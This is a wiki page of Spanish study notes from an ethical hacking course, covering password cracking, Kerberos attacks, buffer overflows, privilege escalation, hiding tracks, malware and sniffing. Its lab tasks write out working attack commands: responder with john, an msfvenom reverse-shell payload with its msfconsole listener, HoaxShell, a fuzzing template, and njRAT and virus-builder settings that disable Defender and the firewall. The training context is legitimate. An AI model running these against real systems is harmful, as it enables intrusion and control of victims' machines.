Aquesta és una revisió antiga del document


Ethical Hacker : sesión 2

  • Modulo 06 - Hack de sistema
  • Modulo 07 - Malware
  • Modulo 08 - Sniffing

sección 1

  • hash
    • linux con salt
      • tail -n 1 /etc/shadow | cut -f2 -d: | tr «$» «\n»
        • 3 campos: algoritmo usado, salt, hash contraseña
    • windows sin salt
  • https://password.kaspersky.com/es/ ← ojo con la información compartida
  • Microsoft: NTLM Authentication
    • hash contraseña cifra un texto aleatorio enviado por el servidor.
    • servidor recibe y descifra con el hash de la contraseña que tiene almacenada y si el texto es el mismo, todo OK
  • Microsoft: Kerberos Auth
    • maquinas, usuarios, aplicaciones → perro Kerberos de 3 cabezas
    • Autenticar (método anterior) usuario (AS - Authentication Server)
    • generador de tiquets (TGS - Ticket Granting Server)
      • duración limitada
      • solicitado para acceso a servicios…
  • Password craking
    • ataques no electrónicos
    • ataques online activos
    • ataques online pasivos (escuchas)
    • ataques offline (rainbow…)
  • Ataques online activos
  • Envenenamiento LLMNR (DNS) /NBT-NS (NETBIOS) (Windows)
    • solución: deshabilitar
  • Ataques a Kerberos
    • AS-REP
    • Kerberoasting (Cracking TGS)
    • Pass the ticket attack
    • NTLM Relay
  • SSH Brute force con shellgpt
  • Spray de passwords
    • después de obtener un listado de passwords, atacar con contraseñas habituales para tener un pie dentro
  • Password-cracking tools:
    • l0phtCrack
    • THC-Hydra
  • EXAM: tener claro el caso de uso de las herramientas de la documentación
  • EXTRA: UNICODE Linux: CRT+SHIFT u, XXXX
  • Windows systeminfo
    • python wes systeminfo.txt
  • Metasploit Framework (MSF)
    • muy modular
    • interfaces: msf* (casi todas)
    • Modulos:
      • Exploit: base para crear uno
      • Payload: comunicación
      • Auxiliary
      • NOPS: instrucciones que no hacen nada (overflow)
      • Encoder: codificar para evitar detección
      • Evasion: modificar características para no ser detectado
      • Post-exploitation: interactuar maquina comprometida
  • Nebula
  • DeepExploit
  • Buffer Overflow
    • malloc - asignación memoria dinámica en C
      • C y Rust
    • Stack (pila) - LiFo
      • registro EIP - dirección de retorno, cambiar para ejecutar codigo malicioso
      • error de segmentation fault
    • Heap (montón) - FiFo
      • error malloc(): corrupted top size
  • readerlf –headers /usr/sbin/sshd ← leer formato ELF
  • xxd: volcado HEX fichero
  • Windows Buffer Overflow Explotation
    • Perform Spiking: paquetes TCP/UDP manipulados para detectar aplicaciones o servidores
    • Perform Fuzzing: gran cantidad de datos aleatorios. Averiguar los bytes requeridos para ajustar la modificación del EIP
    • Identificar Offset
      • se cargan en zonas aleatorias de memoria para evitar que esten «localizables» (incluso lo mueven cada x minutos)
    • Identify bad characters
    • Identificar el módulo adecuado (modulos no protegidos)
  • ROP attack
  • Mecanismos de seguridad ASLR / DEP
    • ASLR: cargar en zonas de memoria aleatoria
    • DEP: prevención de ejecución de datos (declarado como datos y no como ejecutable)
    • JIT Spraying
  • Bloodhound: mapea un AD, relación de recursos de un AD

sección 2: escalada de privilegios

  • si no se especifica el path completo de la libreria, se puede colocar una maligna en un directorio con prioridad de path
  • Spectre / Meltdown: ejecución especulativa: calcula posibles respuestas para adelantarse a la respuesta «humana»
  • pipe
    • mkfifo
  • pivoting and relaying, movimiento lateral
  • UAC = User Account Control
  • Abusar de Boot o Logon al inicializar
  • curl ipconfig.io
  • ADCS: gestor de claves y certificados en AD

sección 3: ocultar huellas

  • pentesting: documentar todo, dentro del ámbito contratado, no se oculta nada.
  • programas maliciosos: …
    • keylogger
    • spyware:
      • avast antivirus free tenía spyware - recopilatorio de información
      • norton grauito (avisando): minado de cripto
  • rootkits
    • reinstalar BIOS, reinstalar OS
  • NTFS Data Stream (o Alternate Data Stream)
    • notepad myfile.txt:otros-datos.txtdir /R
    • en linux la partición ha de estar montada con ()
    • streamdetector
  • Esteganografia: es la práctica de ocultar información dentro de otro mensaje u objeto físico para evitar su detección
    • snow
    • EXAM: métodos de detección
  • Sticky Keys:
    • cinco pulsaciones shift
    • sustituir el ejecutable para colocar otra cosa e invocarlo así
  • Ejecución remota
    • DPAPI: protección API
    • krptgt
    • Ataque llave maestra (skeleton key attack)
    • Golden ticket attack (cualqier ticket)
    • Silver ticket attack (para usuario concreto)
    • ..
    • WMI
  • Linux, comandos

sección 04: ocultar

  • auditpol: cambio auditorias
  • borrar logs
    • manual o script
    • instalar o desinstalar en windows tiene más privilegios que un admin
      • utiliza ADS (alternate data stream) para guardar desde donde lo he descargado
  • Registro Windows MRU (Most Recently Used)
  • history

task 1: Gain Access to the System

  1. sudo responder -I eth0 → capturar hash máquina W11 en txt → hash.txt
  2. john hash.txt → desencripta la contraseña del hash

task 2: Gain Access to a Remote System using Reverse Shell Generator

cmd
  • docker run -d -p 80:80 reverse_shell_generator
    • IP, Port, MSFVenom → genera instrucción: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe
    • se genera un EXE - payload (que hemos de conseguir que ejecute la víctima)
    • generamos la instrucción para escuchar el payload, en la sección LISTENER, modo msfconsole
      • msfconsole -q -x «use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit»
    • ejecutamos el listener, ejecutamos el payload
      • getuid
powershell
    • HoaxShell → PowerShell IEX → cambiar puerto en el script generado por 444
    • copiar y guardar en shell.ps1
    • ir a la sección listener y generar para HoaxShell (puerto 444)
    • ejecutar instrucción generada con sudo: sudo python…
    • ejecutamos en un powershell subido a Administrador el script .ps1

Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System

  • ejecutar como administrador vulnserver (buffer overflow tools)
  • instalar ImmunityDebugger_1_85_setup.exe (y Python 2.7)
  • ejecutar como administrador
    • File → Attach → vulnserver ← pausado
    • Icono PLAY
  • en Linux, ejecutamos nc -nv 10.10.1.11 9999
    • HELP nos lista los comandos disponibles
    • QUIT para salir
    • creamos un «spike template» → pluma stats.spk:
      s_readline();
      
      s_string(“STATS ”);
      
      s_string_variable(“0”);
    • generic_send_tcp 10.10.1.11 9999 stats.spk 0 0
      • los dos últimos ceros son SKIPVAR y SKIPSTR
    • ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable
    • Se hace lo mismo cambiando STAT por TRUN
    • PENDIENTE

Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys

  • PENDIENTE

sección 1

  • troyanos
  • virus
  • ransomware
  • gusanos

sección 2: fileless malware

  • vivir de lo que ha encontrado en la máquina víctima (LOL - Living-off-the-hand)
  • persistencia:
  • taxonomia:
    • hardware - sin actividad a nivel de fichero
    • ejecución / inyección - usa ficheros
    • exploit
  • APUNTES FERNANDO, sección FILELESS

sección 3: AI-based malware

  • FakeGPT
  • WormGPT
  • FraudGPT

sección 4: Analisis malware

  • estático: analizar código
  • dinámico: en máquina virtual (sandbox)
  • testbed (9 pasos)
  • string <file>
  • ofuscación
    • PEid: indica de que tipo es (windows)
    • file para Linux
  • Portable Executables
    • compendio de todos los ficheros necesarios para ejecutar en cualquier máquina sin instalar
  • Dependencias
  • desensamblar
  • ejecutables ELF
    • readelf
  • ejecutables Match-0 (mac)
  • Analizar MS Office (como contenedor de otros archivos)
  • PDF
    • incrustar distro Linux
    • Doom (javascript)
  • Dangerzone

sección 05: contramedidas

  • hub reparte entre todos los puertos, los switch no ← problema para el modo promíscuo
  • switch SPAN Port (modo promíscuo)

sección 2

  • MAC: 3 primeros fabricante, 3 siguientes
  • http://standards-oui.ieee.org/oui/oui.txt - Listado de fabricantes y sus MACs asociadas
  • ARP:
    • broadcast, no sale a internet, solo LAN, solo IPv4
  • tabla CAM
    • si se llena la tabla, no se reparte tráfico
    • saturar para cambiar a modo HUB → macof
  • Switch Port Stealing
    • hacer creer que la máquina ha cambiado de puerto, recibir el tráfico y redirigir a la original
  • DHCP Starvation Attack
    • hambruna
    • DoS
  • Rogue DHCP Server Attack
  • ARP Spoofing attack
  • Capsa Portable Network Analyzer
  • IRDP Spoofing
  • VLAN Hopping
    • ver todas las VLAN
  • STP Attack
  • DNS Poisoning
  • Detección
    • modo promíscuo
    • nmap detecta (script)

Task 1: Gain Control over a Victim Machine using the njRAT RAT Trojan

  • njRAT v0.8d
    • puerto 5553
    • Build
      • Host (IP máquina local)
      • Randomize Stub
      • USB Spread Nj8d
      • Protect Process (BSOD)
    • Copiar .exe en maquina víctima y ejecutar
    • en ese mismo momento, aparece información en el RAT
      • archivos
      • tareas
      • registro
      • remote desktop
      • control de camara
      • keylogger

Task 1: Create a Virus using the JPS Virus Maker Tool and Infect the Target System

  • JPS Virus Maker
    • marcar Auto Startup
    • Disable TaskManager
    • Disable Windows Update
    • Disable Control Panel
    • Disable Drives
    • Hide Desktop Icons
    • Enable Remote Desktop
    • Remove Bluetooth
    • Turn Off Windows Firewall
    • Turn Off Windows Defender
    • en opciones:
      • Change Windows Password
      • Change Computer Name
      • Enable Convert to Worm
      • JPG Icon

Task 1: Perform Malware Scanning using Hybrid Analysis

Task 2: Analyze ELF Executable File using Detect It Easy (DIE)

  • Detect It Easy v3.09

Task 3: Perform Malware Disassembly using IDA and OllyDbg

  • IDA Freeware 8.4
  • udemy test
  • examtopics (pago)
  • ProxMox
  • info/cursos/pue/ethical-hacker/sesion2.1739953122.txt.gz
  • Darrera modificació: 19/02/2025 00:18
  • per mate